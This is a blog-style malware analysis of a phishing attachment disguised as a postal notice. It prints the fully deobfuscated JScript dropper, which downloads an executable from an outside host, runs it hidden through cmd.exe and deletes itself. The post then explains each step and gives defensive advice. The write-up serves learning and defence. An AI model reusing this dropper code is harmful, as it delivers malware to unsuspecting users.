Analyzing JavaScript Malware


About half a year ago, my girlfriend got an e-mail from the post office saying that a package was ready for pickup, with a quick note that more information was available in the attachment. I was asked to look at it, as she found it suspicious: the mail was written very poorly, definitely not how an official mail would sound. First I took a look at the domain the mail was sent from, and as I expected, it had nothing to do with the domains of our postal service. But what I really wanted to know was: what's the goal of the attachment?

First contact

After downloading it, I noticed that the file's extension was .js, a JavaScript file. I only noticed because I have Explorer set to show file extensions; someone without this option would see it only as a .txt file. Viewing the source unfortunately gave me no clue at first how it works. The script was around 400 lines of code, but after looking closer it seemed that only about a quarter of it actually did something; the rest was filler: variable assignments and functions returning pieces of words.

// An object literal indexed on the spot: tbuloq1 is just the string "AtEn".
// The other keys are never used anywhere.
var tbuloq1 = {
  itxy:'plebydva', 8423:730, ldipli:353, lgahze:"AtEn", ekxov:'dipyvvo'
}["lgahze"];

// A helper that always returns the single character "d".
function daqkuvtejqa3 () {
  var ssororg0 = {
    lifki:'hylxyzra', 2216:"d", 6034:'ubylivw'
  };
  var xhahbolz3 = ssororg0["2216"];
  return xhahbolz3;
}

But after some time I noticed a pattern: the last 30 lines of code contained only references to the variables, and after connecting them together, what I got was much more readable than before. For example, if you take this piece of code and connect it to the variables defined at the beginning, you get something more like this.

ejybpib6 = zoracufyp7[nsatqe9 + oxqokowj9 + ynxyru7 + exgemko2];

Great, now to make it clearer to read I have to do the same for the rest. Unfortunately I'm not completely sure that it's 'translated' 100% correctly, but it still gives me insight into how this script may work.

ejybpib6 = this.WScript;

Finally, after around 3 hours, I had the full translation. But I still had a few questions: what is WScript and how does it work?

// Handles to the COM objects the script uses; they are reused below.
ejybpib6 = this.WScript;
ehynzedda7 = WScript.CreateObject("Scripting.FileSystemObject");
elmona4 = WScript.CreateObject("WScript.Shell");
acjihy9 = WScript.CreateObject("MSXML2.XMLHTTP");
jyfej9 = WScript.CreateObject("ADODB.Stream");
oqavate7 = ehynzedda7.GetSpecialFolder(2);      // 2 = TemporaryFolder (%TEMP%)

// Under WSH there is no `document`, so this condition only fails inside a browser.
if (typeof document == "undefined") {
  kagignu5 = ehynzedda7.GetTempName();          // random name for the dropped file
}

// JScript's typeof returns "unknown" for some COM members; another check that this is the real WSH.
if (typeof WScript.StdIn.AtEndOfStream == "unknown") {
  ixzebni1 = acjihy9.open("GET", 'http://some_ip_address/8899.exe', 0);   // 0 = synchronous request
}
ixzebni1 = acjihy9.send();
jyfej9.type = 1;                                // adTypeBinary
try {
  if (!WScript.Arguments.Unnamed.length) {      // only when started without arguments, i.e. by double-click
    oxacobmo3 = acjihy9.ResponseBody;
  }
  ruzetpa0 = WScript.ScriptFullName;            // path of this .js file
  ixzebni1 = jyfej9.Open();
  ixzebni1 = jyfej9.Write(oxacobmo3);
  ixzebni1 = jyfej9.SaveToFile(oqavate7 + kagignu5);
  ixzebni1 = jyfej9.Close();
  ixzebni1 = elmona4.run("cmd.exe /c " + oqavate7 + kagignu5, 0);   // 0 = hidden window
  ixzebni1 = ehynzedda7.deleteFile(ruzetpa0);   // the dropper deletes itself
}
catch(e) {
}

Okay, as far as I can understand, it downloads a file from a URL (the real address is replaced in the listing above) and somehow executes it, maybe using cmd? But for better insight I had to dig for references showing how WScript and the other functions in this code are used.

Understanding

Windows Script Host (WSH) is the Windows scripting environment that runs scripts in several languages, JScript and VBScript out of the box. The consequence that matters here: a .js file saved to disk is not a web page script. Double-clicking it starts wscript.exe, which runs it with the full privileges of the logged-in user, with no sandbox and with access to the file system, the network and the shell, exactly like an executable.

The script uses these WScript calls:

  • WScript.CreateObject("WScript.Shell") gives access to the shell: running commands (Run), environment variables, the registry.
  • WScript.CreateObject("MSXML2.XMLHTTP") is an XMLHTTP object, in other words an HTTP client; here it fetches a binary with a plain GET.
  • WScript.CreateObject("ADODB.Stream") represents a stream of binary data or text; here it is how the response body gets written to disk.

GetSpecialFolder(2) returns the temporary folder (%TEMP%); the other values, 0 and 1, would be the Windows and System folders.

Then the script opens an HTTP GET request to the specified URL (the third argument to open, 0, makes it synchronous, so the script waits for the whole download) and sends it.

After that the script runs a series of steps inside a try block (any error is swallowed by the empty catch, so a failed download simply ends the script silently):

  1. Read the response body of the request.
  2. Write it, as binary (ADODB.Stream type 1), to a randomly named file in the temp directory.
  3. Save and close the stream.
  4. Execute the file through cmd.exe /c with a hidden window (the 0 passed to Run).
  5. Lastly, delete the .js script itself (WScript.ScriptFullName); the downloaded executable is left in place, only the dropper disappears.

Unfortunately, the .exe was no longer available by the time I got to check, and I couldn't find as much info about it as I wanted. The only information I could find was:

Operating System: Windows 7 / 8 / 8.1 / 10
Signature Name: QVM07.1.Malware.Gen

Main Info:

Name: 8899.exe
Size: 569464 bytes
Type: PE32 executable (GUI) Intel 80386, for MS Windows
MD5: 3771453fc565a0436534d509dcb7da9f
SHA1: 803e3634a70dd3b9ce2b409b108cb1baf5fa3d08

Reported symptoms:

  • Freezing computer.
  • New home page in browsers.
  • Ads and pop-ups on the desktop and in the browser.
  • Very slow loading of webpages.
  • Computer works slower than usual.

Conclusion

The author of this malware did a lot to obfuscate this script, and I spent a lot of time making it readable, but still it wasn't as complicated as I thought at first. To stay protected from these kinds of attacks, tell Explorer to open .js files with Notepad by default (the same goes for the other extensions WSH handles: .jse, .vbs, .vbe, .wsf, .wsh), and show file extensions. That way you will see whether it's really a text document or .txt.js malware. And the most important step: don't download files that you're unsure about. Simply, don't trust anyone ;)

I had great fun trying to understand the concept, and even though you may think it was very simple, I still learned a lot from this.

Keep learning and stay safe! ~ W3ndige